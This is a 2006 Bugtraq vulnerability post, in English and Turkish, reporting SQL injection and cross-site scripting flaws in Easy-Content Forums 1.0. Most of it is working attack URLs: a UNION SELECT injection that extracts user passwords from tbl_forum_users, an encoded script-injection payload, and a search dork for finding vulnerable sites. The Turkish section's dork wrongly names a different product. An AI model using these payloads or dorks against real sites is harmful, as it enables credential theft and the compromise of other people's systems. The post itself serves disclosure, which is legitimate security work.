[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060523183957.25838.qmail@securityfocus.com>
Date: 23 May 2006 18:39:57 -0000
From: ajannhwt@...mail.com
To: bugtraq@...urityfocus.com
Subject: Easy-Content Forums 1.0 Multiple [SQL/XSS] Vulnerabilities
ENGLISH
# Title : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
# Dork : "Copyright 2004 easy-content forums"
# Author : ajann
# Exploit;
SQL INJECTİON--------------------------------------------------------
### http://[target]/[path]/userview.asp?startletter=SQL TEXT
### http://[target]/[path]/topics.asp?catid=1'SQL TEXT =>catid=x
Example:
http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users
XSS--------------------------------------------------------
### http://[target]/[path]/userview.asp?startletter=xss TEXT
### http://[target]/[path]/topics.asp?catid=30&forumname=XSS TEXT
Example:
http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E
%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E == X
# ajann,Turkey
TURKISH
# Başlık : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
# Sözcük[Arama] : "powered by phpmydirectory"
# Açığı Bulan : ajann
# Açık bulunan dosyalar;
SQL INJECTİON--------------------------------------------------------
### http://[target]/[path]/userview.asp?startletter=SQL SORGUNUZ
### http://[target]/[path]/topics.asp?catid=1'SQL SORGUNUZ =>catid=Değişken
Örnek:
http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users
XSS--------------------------------------------------------
### http://[target]/[path]/userview.asp?startletter=XSS KODLARINIZ
### http://[target]/[path]/topics.asp?catid=30&forumname=XSS KODLARINIZ
Örnek:
http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E
%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E Ekrana X uyarısı çıkarıcaktır.
Açıklama:
userview.asp , topics.asp dosyalarında bulunan filtreleme eksikliği nedeniyle sql sorgu çalıştırılabilmektedir.
userview.asp , topics.asp dosyalarında bulunan filtreleme eksikliği nedeniyle xss kodları çalışabilmektedir.
# ajann,Turkiye
Powered by blists - more mailing lists